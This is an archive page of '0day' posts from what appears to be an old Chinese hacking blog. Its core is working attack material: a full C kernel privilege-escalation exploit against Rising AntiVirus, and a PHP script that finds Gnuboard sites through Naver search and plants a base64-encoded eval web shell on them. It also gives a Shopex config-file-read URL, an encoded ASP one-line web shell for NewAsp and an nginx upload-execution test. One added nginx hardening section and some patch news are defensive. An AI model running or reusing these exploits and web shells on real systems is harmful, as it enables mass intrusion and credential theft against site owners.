Archive

Posts tagged '0day'

Do you still dare to open txt files? A Windows 0day

June 10, 2010  Chinadu  5 comments

Source: Chinadu's Blog

http://www.4shell.org/archives/1777.html

To be honest this is neither a vulnerability nor a 0day; it is just a Windows fun trick.

Test as follows:

1. Pick any exe file, right-click it and choose Rename:


Read more...

Category: Technical Articles  Tags: ,

Orange alert: PHP PATH_INFO vulnerability

May 21, 2010  Chinadu  1 comment

PS: This vulnerability was actually disclosed ten years ago; now that it has spread widely it will probably set off a small revolution, and the source code of quite a few big sites is going to leak.
PHP PATH_INFO vulnerability

Any site built on nginx+php that allows image uploads can be compromised. As of the early hours of May 21, nginx has not released a patch for this vulnerability; some sites have already been hacked. Administrators, fix this quickly!

Test method:

Upload an image to the nginx server, open the image URL, and append 4shell.php to it.

For example: www.xx.com/upload/201005219527.jpg/4shell.php

Temporary fixes: choose one of the three
Read more...

Category: Technical Articles  Tags: , ,
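The pattern behind the test above is the usual nginx fastcgi block that forwards every URI ending in .php to PHP-FPM; with php.ini's default cgi.fix_pathinfo=1, PHP walks back from the non-existent /upload/....jpg/4shell.php to the existing .jpg and executes it as PHP. The following is an added example, not configuration from the original post: the weak block beside a hardened one. The /upload/ path and the 127.0.0.1:9000 FastCGI address are assumptions.

```nginx
# Constructed example (not the post's own config).

# WEAK: any URI that ends in .php is handed to PHP-FPM, even when the
# file does not exist. With cgi.fix_pathinfo=1 PHP then executes the
# nearest existing path component, e.g. an uploaded .jpg.
location ~ \.php$ {
    fastcgi_pass   127.0.0.1:9000;          # assumed FPM address
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include        fastcgi_params;
}

# HARDENED: three independent mitigations (set cgi.fix_pathinfo=0 in
# php.ini as well).
# 1. The upload directory must never execute PHP. Regex locations are
#    matched in order, so this block has to come before the general one.
location ~* ^/upload/.*\.php$ {             # assumed upload path
    return 403;
}

location ~ \.php$ {
    # 2. Only forward requests whose script file really exists on disk;
    #    /upload/x.jpg/4shell.php does not, so this answers 404.
    try_files $uri =404;
    # 3. Refuse script names with a further path component after a
    #    dotted name (the "file.jpg/anything.php" shape).
    if ($fastcgi_script_name ~ "\..*/.*php") {
        return 403;
    }
    fastcgi_pass   127.0.0.1:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include        fastcgi_params;
}
```

Either of the nginx-side checks alone closes the path shown in the post; cgi.fix_pathinfo=0 closes it on the PHP side regardless of how the web server is configured, which is why it is the safer default on a shared host.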

Shopex V4.8.4 / V4.8.5 universal 0day

April 23, 2010  Chinadu  no comments

Affected versions: Shopex V4.8.4, V4.8.5
Vulnerability description: insufficient file filtering leads to an arbitrary file read.
Test code:

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

The returned credentials can then be used to connect to the database.
Read more...

Category: Technical Articles  Tags: ,

Latest PDF 0day

April 1, 2010  Chinadu  no comments

There's a function within PDF specs to launch executables. Or to run JavaScript. Why do we need these things?

With specs like these, it's no wonder it takes ages for Adobe Reader to boot up and load all the plugins.

It's no wonder there are regular security problems with PDF readers in general.

The perfect example is the "Escape from PDF" demo from Didier Stevens' blog.

Users of Foxit Reader: try opening Didier's demo PDF file. After opening, it will run CMD.EXE on your system; no questions asked. And this is a legitimate PDF file which uses no exploits.

One way to reduce your risk is not to download PDF files from the web to your machine at all. Instead of opening the files on your local machine, you can open them remotely in viewers like Google Docs. This process can be made completely automatic with plugins like gPDF (for Chrome/Opera/Firefox/Iron). Do note that it will only work with PDF files you access in the public web.

Otherwise, our guidance would be to use a PDF reader that's as unpopular as possible. The less users a product has, the less attacks it will attract.

PS: Downloading and running the demo PDF file pops up CMD.exe. I recommend using Chrome with the Docs PDF/PowerPoint Viewer.

Category: Industry News  Tags: ,

The Firefox 3.6 0day has been patched

March 24, 2010  Chinadu  no comments

Update on Secunia Advisory SA38608

Mozilla was contacted by Evgeny Legerov, the security researcher who discovered the bug referenced in the Secunia report, with sufficient details to reproduce and analyze the issue.  The vulnerability was determined to be critical and could result in remote code execution by an attacker.  The vulnerability has been patched by developers and we are currently undergoing quality assurance testing for the fix.  Firefox 3.6.2 is scheduled to be released March 30th and will contain the fix for this issue.  As always, we encourage users to apply this update as soon as it is available to ensure a safe browsing experience.  Alternatively, users can download Release Candidate builds of Firefox 3.6.2 which contains the fix from here:  https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.2-candidates/build3/

Update: To clarify, as originally claimed this issue affects Firefox 3.6 only and not any earlier versions. Thunderbird and SeaMonkey are based on earlier versions of the browser engine and are not affected. People testing "3.7" development builds should upgrade to 3.7 alpha 3 or the latest nightly build to ensure they have this fix.

Category: Industry News  Tags: ,

DedeCms v5.5 0day

March 10, 2010  Chinadu  no comments

The vendor has not released a patch yet, but I expect one soon.
On success it creates a one-line webshell t.php under data/cache,
password t. The latest official GBK and utf-8 versions are affected.
What is special about this exp is that it leaves no log entry when generating t.php.

Read more...

Category: 矩阵毒刺  Tags: ,

Rising local privilege escalation universal exploit code

January 31, 2010  Chinadu  no comments

After compiling, run this program: it restores Rising's SSDT directly from ring3, after which you can do whatever you like. Tested just now (January 28) against Rising 2010; reportedly it also works on the 2009 and 2008 versions.

//MY Blog:http://hi.baidu.com/9908006
//MY QQ:165659238
//VC-ConsoleWithApi
#include "stdafx.h"
#include "windows.h"
#include <stdio.h>

enum { SystemModuleInformation = 11 };

typedef struct {
    ULONG Unknown1;
    ULONG Unknown2;
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0;

void __stdcall WriteKVM(PVOID Address, ULONG Value)
{
    ULONG ColorValue = Value;
    ULONG btr;
    ULONG ColorBuffer = 0;

    DeviceIoControl(g_RsGdiHandle, 0x83003C0B, &ColorValue, sizeof(ULONG),
                    &ColorBuffer, sizeof(ULONG), &btr, 0);
    DeviceIoControl(g_RsGdiHandle, 0x83003C0B, &ColorValue, sizeof(ULONG),
                    Address, sizeof(ULONG), &btr, 0);
    return;
}

void AddCallGate()
{
    ULONG Gdt_Addr;
    ULONG CallGateData[0x4];
    ULONG Icount;

    __asm
    {
        push edx
        sgdt [esp-2]
        pop edx
        mov Gdt_Addr, edx
    }
    __asm
    {
        push 0xc3
        push Gdt_Addr
        call WriteKVM
        mov eax, Gdt_Addr
        mov word ptr [CallGateData], ax
        shr eax, 16
        mov word ptr [CallGateData+6], ax
        mov dword ptr [CallGateData+2], 0x0ec0003e8
        mov dword ptr [CallGateData+8], 0x0000ffff
        mov dword ptr [CallGateData+12], 0x00cf9a00
        xor eax, eax
    LoopWrite:
        mov edi, dword ptr CallGateData[eax]
        push edi
        mov edi, Gdt_Addr
        add edi, 0x3e0
        add edi, eax
        push edi
        mov Icount, eax
        call WriteKVM
        mov eax, Icount
        add eax, 0x4
        cmp eax, 0x10
        jnz LoopWrite
    }
    return;
}

void IntoR0(PVOID function)
{
    WORD Callgt[3];
    Callgt[0] = 0;
    Callgt[1] = 0;
    Callgt[2] = 0x3e3;

    __asm
    {
        call fword ptr [Callgt]
        mov eax, esp
        mov esp, [esp+4]
        push eax
        call function
        pop esp
        push offset ring3Ret
        retf
    ring3Ret:
        nop
    }
    return;
}

#pragma pack(1)
typedef struct _IDTR
{
    SHORT IDTLimit;
    UINT IDTBase;
} IDTR, *PIDTR, **PPIDTR;
#pragma pack()

ULONG g_RealSSDT = 0;
ULONG ServiceNum = 0;
ULONG OrgService[0x1000];

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
{
    ULONG Offset = Rva, Limit;
    IMAGE_SECTION_HEADER *Img;
    WORD i;

    Img = IMAGE_FIRST_SECTION(NT);
    if (Rva < Img->PointerToRawData)
        return Rva;

    for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
    {
        if (Img[i].SizeOfRawData)
            Limit = Img[i].SizeOfRawData;
        else
            Limit = Img[i].Misc.VirtualSize;

        if (Rva >= Img[i].VirtualAddress &&
            Rva < (Img[i].VirtualAddress + Limit))
        {
            if (Img[i].PointerToRawData != 0)
            {
                Offset -= Img[i].VirtualAddress;
                Offset += Img[i].PointerToRawData;
            }
            return Offset;
        }
    }
    return 0;
}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
{
    PIMAGE_DOS_HEADER mzhead = (PIMAGE_DOS_HEADER)ibase;

    if ((mzhead->e_magic != IMAGE_DOS_SIGNATURE) || (ibaseDD[mzhead->e_lfanew] != IMAGE_NT_SIGNATURE))
        return FALSE;
    *pfh = (PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
    if (((PIMAGE_NT_HEADERS)*pfh)->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;
    *pfh = (PIMAGE_FILE_HEADER)((PBYTE)*pfh + sizeof(IMAGE_NT_SIGNATURE));
    *poh = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh + sizeof(IMAGE_FILE_HEADER));
    if ((*poh)->Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC)
        return FALSE;
    *psh = (PIMAGE_SECTION_HEADER)((PBYTE)*poh + sizeof(IMAGE_OPTIONAL_HEADER));
    return TRUE;
}

typedef struct {
    WORD offset:12;
    WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule, DWORD dwKSDT, PULONG ImageBase)
{
    PIMAGE_FILE_HEADER pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER psh;
    PIMAGE_BASE_RELOCATION pbr;
    PIMAGE_FIXUP_ENTRY pfe;
    DWORD dwFixups = 0, i, dwPointerRva, dwPointsToRva, dwKiServiceTable;
    BOOL bFirstChunk;

    GetHeaders((PCHAR)hModule, &pfh, &poh, &psh);

    if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
        (!((pfh->Characteristics) & IMAGE_FILE_RELOCS_STRIPPED))) {
        pbr = (PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress, hModule);
        bFirstChunk = TRUE;
        while (bFirstChunk || pbr->VirtualAddress) {
            bFirstChunk = FALSE;
            pfe = (PIMAGE_FIXUP_ENTRY)((DWORD)pbr + sizeof(IMAGE_BASE_RELOCATION));
            for (i = 0; i < (pbr->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1; i++, pfe++) {
                if (pfe->type == IMAGE_REL_BASED_HIGHLOW) {
                    dwFixups++;
                    dwPointerRva = pbr->VirtualAddress + pfe->offset;
                    dwPointsToRva = *(PDWORD)((DWORD)hModule + dwPointerRva) - (DWORD)poh->ImageBase;
                    if (dwPointsToRva == dwKSDT)
                    {
                        if (*(PWORD)((DWORD)hModule + dwPointerRva - 2) == 0x05c7)
                        {
                            dwKiServiceTable = *(PDWORD)((DWORD)hModule + dwPointerRva + 4) - poh->ImageBase;
                            *ImageBase = poh->ImageBase;
                            return dwKiServiceTable;
                        }
                    }
                }
            }
            *(PDWORD)&pbr += pbr->SizeOfBlock;
        }
    }
    return 0;
}

DWORD CR0Reg;
ULONG realssdt;

void InKerneProc()
{
    __asm
    {
        cli
        mov eax, cr0
        mov CR0Reg, eax
        and eax, 0xFFFEFFFF
        mov cr0, eax
    }

    int i;
    for (i = 0; i < (int)ServiceNum; i++)
    {
        *(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i];
    }

    __asm
    {
        mov eax, CR0Reg
        mov cr0, eax
        sti
    }
}

int main(int argc, char* argv[])
{
    printf("Rising AntiVirus 2008 ~ 2010\n"
           "Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n2010-1-27\n");

    g_RsGdiHandle = CreateFile("\\\\.\\RSNTGDI", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
    if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    SYSTEM_MODULE_INFORMATION ModuleInfo;

    // Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and its base address
    HMODULE hlib = GetModuleHandle("ntdll.dll");
    PVOID pNtQuerySystemInformation = GetProcAddress(hlib, "NtQuerySystemInformation");
    ULONG infosize = sizeof(ModuleInfo);

    __asm
    {
        push 0
        push infosize
        lea eax, ModuleInfo
        push eax
        push 11
        call pNtQuerySystemInformation
    }

    HMODULE KernelHandle;
    LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

    // Load the kernel image specified
    KernelHandle = LoadLibrary(ntosname);
    if (KernelHandle == 0)
    {
        return 0;
    }

    ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle, "KeServiceDescriptorTable");
    if (KeSSDT == 0)
    {
        return 0;
    }

    ULONG ImageBase = 0;
    ULONG KiSSDT = FindKiServiceTable(KernelHandle, KeSSDT - (ULONG)KernelHandle, &ImageBase);
    if (KiSSDT == 0)
    {
        return 0;
    }

    KiSSDT += (ULONG)KernelHandle;
    ServiceNum = 0x11c;

    ULONG i;
    for (i = 0; i < ServiceNum; i++)
    {
        OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;
    }

    realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

    SetThreadAffinityMask(GetCurrentThread(), 0);
    AddCallGate();
    IntoR0(InKerneProc);

    return 0;
}

Category: Technical Articles  Tags: , ,

The IE "Aurora" 0day attack code has fully leaked; WebSense issues a security warning

January 20, 2010  Chinadu  no comments

News of targeted attacks against Google, Adobe and other large companies was disclosed last week. Security staff initially expected the attacks to use malicious PDF files, but last Thursday Microsoft confirmed that they were triggered by a new security vulnerability in Internet Explorer.
Attack code for this vulnerability has now been detected spreading, and the corresponding malicious pages have appeared. The security research firm WebSense issued a security warning today; below is a screenshot of the technical analysis:

http://www.4shell.org/wp-content/uploads/images/2010/01/10114162i.png
Read more...

Category: Industry News  Tags: ,

Gnuboard 0day & Exp

September 22, 2009  Chinadu  no comments

The exploit code is as follows:

<?php
echo" +----------------------------------------------------------------+\r\n";
echo" http://www.t00ls.net\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);

}

function get($host,$file)
{

$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i<count($put[0]);$i++) {
$a=(int)$i*3;

fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);

break;

}

fclose($fp);

}

function fuck($ok)
{

$a=preg_replace('(bbs\/board.php)','',$ok);

$file=$a."common.php?g4_path=/tmp%002345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath." %00 ok"."\r\n";
}

if (eregi("(fuckyou)",$oksehll))
{

print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('gnuboard.txt',"a+");
fwrite($sh,$axx);
fclose($sh);

}

}
else
{

print $sitepath." Vulnerability no"."\r\n";

}

}

?>

Category: Shared Resources  Tags: , ,

NewAsp (新云) 4.0 latest 0day

September 22, 2009  Chinadu  no comments

Insert the following encoded one-liner in the password-hint question field: ┼攠數畣整爠煥敵瑳∨≡┩愾
After registering successfully, connect to the default database file: ask/data/ask_newasp.asa, password: a

Category: Technical Articles  Tags: ,